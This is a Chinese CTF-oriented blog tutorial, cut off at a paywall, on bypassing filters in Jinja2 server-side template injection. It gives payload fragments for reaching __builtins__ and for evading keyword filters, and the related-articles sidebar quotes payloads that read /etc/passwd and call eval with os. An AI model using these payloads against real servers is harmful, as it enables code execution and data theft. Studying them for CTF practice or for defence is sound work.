SSTI模板注入绕过(进阶篇)

原创 已于 2024-06-14 11:24:11 修改 · 置顶 · 2.4w 阅读 · 210 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ctf

于 2020-12-11 17:40:19 首次发布
本文详细介绍了Jinja2模板引擎的语法及变量处理方法,并深入探讨了如何利用各种技巧进行模板注入攻击,包括字符串构造、获取键值和属性等。

文章目录


下面的内容均以jinja2为例,根据官方文档来探寻绕过方法
文档链接
默认大家都已经可以利用没有任何过滤的模板注入

语法

官方文档对于模板的语法介绍如下

{% ... %} for Statements 

{
  
  { ... }} for Expressions to print to the template output

{# ... #} for Comments not included in the template output

#  ... # for Line Statements

{%%}可以用来声明变量,当然也可以用于循环语句和条件语句。
{ {}}用于将表达式打印到模板输出
{##}表示未包含在模板输出中的注释
##可以有和{%%}相同的效果

{
   
   % set x= 'abcd' %}  声明变量
{
   
   % for i in ['a','b','c'] %}{
   
   {
   
   i}}{
   
   %endfor%} 循环语句
{
   
   % if 25==5*5 %}{
   
   {
   
   1}}{
   
   % endif %}  条件语句

# for i in ['a','1']
{
   
   {
   
    i }}
# endfor

{
   
   % for i in ['a','1'] %}
{
   
   {
   
    i }}
{
   
   % endfor %}

这两条是等效的,但是有个前提,必须在environment中配置line_statement_prefix
即
app.jinja_env.line_statement_prefix="#"
但我尝试之后发现开启不了,不知道为什么

变量

You can use a dot (.) to access attributes of a variable in addition to the standard Python __getitem__ “subscript” syntax ([]). --官方原文

也就是说
除了标准的python语法使用点(.)外,还可以使用中括号([])来访问变量的属性。
比如

{
   
   {
   
   "".__class__}}
{
   
   {
   
   ""['__classs__']}}

所以过滤了点,我们还可以用中括号绕过。
如果想调用字典中的键值,其本质其实是调用了魔术方法__getitem__
所以对于取字典中键值的情况不仅可以用[],也可以用__getitem__
当然对于字典来说,我们也可以用他自带的一些方法了。pop就是其中的一个

pop(key[,default])
参数
key: 要删除的键值
default: 如果没有 key,返回 default 值
删除字典给定键 key 所对应的值,返回值为被删除的值。key值必须给出。 否则,返回default值。

我们要使用字典中的键值的话,也可以用list.pop("var"),但大家最好不要用这个,除非万不得已,因为会删除里面的键,如果删除的是一些程序运行需要用到的,就可能使得服务器崩溃。然后过了一遍字典的方法,发现getsetdefault是个不错的选择

dict.get(key, default=None)
返回指定键的值,如果值不在字典中返回default值

dict.setdefault(key, default=None)
和get()类似, 但如果键不存在于字典中,将会添加键并将值设为default

{
   
   {
   
   url_for.__globals__['__builtins__']}}
{
   
   {
   
   url_for.__globals__.__getitem__('__builtins__')}}
{
   
   {
   
   url_for.__globals__.pop('__builtins__')}}
{
   
   {
   
   url_for.__globals__.get('__builtins__')}}
{
   
   {
   
   url_for.__globals__.setdefault('__builtins__')}}

那么调用对象的方法具体是什么原理呢,其实他是调用了魔术方法__getattribute__

"".__class__
"".__getattribute__("__class__")

如果题目过滤了class或者一些关键字,我们是不是就可以通过字符串处理进行拼接了。
对于我们来说,能转换成字符串会更好处理一些。
那我们就顺势讲一下字符串的一些处理方法。
1、拼接
"cla"+"ss"
2、反转
"__ssalc__"[::-1]

但是实际上我发现其实加号是多余的,在jinjia2里面,"cla""ss"是等同于"class"的,也就是说我们可以这样引用class,并且绕过字符串过滤

""["__cla""ss__"]
"".__getattribute__("__cla""ss__")
""["__ssalc__"][::-1]
"".__getattribute__("__ssalc__"[::-1])
最低0.47元/天 解锁文章
【网络安全 | 2w字总结】SSTI漏洞入门
等风来
08-24 1万+
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
Web安全漏洞——SSTI模版注入(初级)
m0_61506558的博客
11-12 1738
(这里特指用于Web开发的模版引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模版引擎来生成前端的html代码,模版引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模版+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前(如图一)。模版引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。(一)简介用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。
最全SSTI模板注入waf绕过总结(6700+字数!)
2301_76690905的博客
11-09 9330
详细介绍了各种方法绕过混合过滤,关键字过滤,各种符号过滤,点过滤,下划线过滤,单双引号过滤,很齐全
SSTI注入绕过-Jinjia2模板
fatmoForE
11-29 765
题目选自NCTF2020的Master 源码如下: from jinja2 import Template from flask import Flask,request app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') blacklist = ['%', '-', ':', '+', 'class', 'base', 'mro', '_', 'con
SSTI注入——python中的ssti
wwwwyyyrre的博客
06-05 1403
python里的运用最多的应该就是flask模板注入 也可以直接用tplmap自动化注入来找到ssti注入点python21.2.3.4.5.6.python31.2.
关于SSTI模块注入的常见绕过方法
Welcome To My6n Blog
07-05 2687
1、过滤了中括号 2、过滤了双下划线 3、过滤了单下划线 4、过滤了点 5、过滤了大括号 6、过滤了引号 7、过滤了数字
SSTI模板注入-常用的一些绕过
九尾ww的博客
10-27 690
漏洞成因:服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。 python的flask,php的tp,java的spring等一般都采用成熟的的MVC的模式 1.过滤[]等括号 使用gititem绕过。如原poc {{"".class.bases[0]}} 绕过后{{"".class.bases.getitem(0)}}
SSTI模板注入基础(Flask+Jinja2)
qq_55202378的博客
12-22 2443
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模板引擎来生成前端的html代码,模板引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前。由于python一切皆对象的特性,函数本质上也是对象,也存在类中的一些内置方法和内置属性,所以我们可以执行接下来的操作。是类中的一个内置属性,值是该实例的对应的类。
攻防世界web解题[进阶](五)
weixin_46703850的博客
03-10 612
攻防世界web解题[进阶](五) 介绍:记录解题过程 15.Web_python_template_injection(python 模板注入) 16.Web_php_unserialize( php 反序列) 17.easytornado 18.shrine(flask模板注入)
SSTI注入WAF绕过
zkaq7777777的博客
06-03 1486
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎?模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
六、SSTI模板注入绕过
黑日里不灭的light
10-20 543
解释:SSTI(Server-Side Template Injection)是一种在服务器端模板注入恶意代码的攻击技术。它利用了模板引擎的漏洞,使攻击者能够将恶意代码插入到模板中,在服务器端执行这些代码,例如python的flask就存在容易出现这个问题。危害:代码执行:攻击者可以通过SSTI注入在服务器端执行任意代码,包括命令执行、远程文件包含等攻击。这可能导致服务器被完全控制,进一步导致数据泄漏、服务器崩溃或恶意操作。
SSTI漏洞利用及绕过总结(绕过姿势多样)
永不落的梦想
07-15 5936
SSTI模板注入,详细的常用注入模块利用,全面的SSTI绕过总结
SSTI模块注入SSTI+Flask+Python(下):绕过过滤
07-25 3498
SSTI绕过过滤
xmctf web11-考核(模板注入绕过)
羽的博客
06-27 991
web11-考核(模板注入绕过) 输入name=1发现存在回显,猜测为模板注入,经过测试发现过滤了 . _ 和一些关键字 py2模板注入常见payload ().__class__.__bases__[0].__subclasses__()[40](r'/etc/passwd').read() ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]['eval']('__import__("os").
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 1171
CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号、数字被过滤绕过ctfshow web入门370)
你们de4月天的博客
03-30 2114
ctfshow web入门370 中括号、args、request、下划线、引号、花括号、数字、os被过滤 SSTI模板注入漏洞
SSTI漏洞学习(下)——Flask/Jinja模板引擎的相关绕过
MachineGunJoe666
08-03 1306
0x01 再看寻找Python SSTI攻击载荷的过程 获取基本类 对于返回的是定义的Class内的话: __dict__ //返回类中的函数和属性,父类子类互不影响 __base__ //返回类的父类 python3 __mro__ //返回类继承的元组,(寻找父类) python3 __init__ //返回类的初始化方法 __subclasses__() //返回类中仍然可用的引用 python3 __globals__ //对包含函数全局变量的字典的引用 python3....
jinja2模板注入_Flask/Jinja2模板注入中的一些绕过姿势
weixin_36329818的博客
01-17 442
转自 https://p0sec.net/index.php/archives/120/好长时间没更新过了,ssti也不是新东西,打国赛半决赛,简直是demo全家桶,ssti必然是遇到不少。很多东西只是保存在收藏栏里,用的时候再查很浪费时间,记录一下,遇到时也能顺手一点。0x00 获取基本类首先通过str、dict、tuple或list获取python的基本类(当然也可以利用一些其他在jinja2...
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 4998
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
ssti模板注入
最新发布
03-14
好的,我现在需要处理用户关于SSTI(服务器端模板注入)漏洞的查询。用户想了解其原理及防御措施。首先,我要确保自己正确理解SSTI的基本概念。 根据引用[5],SSTI漏洞是因为服务端接收了用户的恶意输入后,未经...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值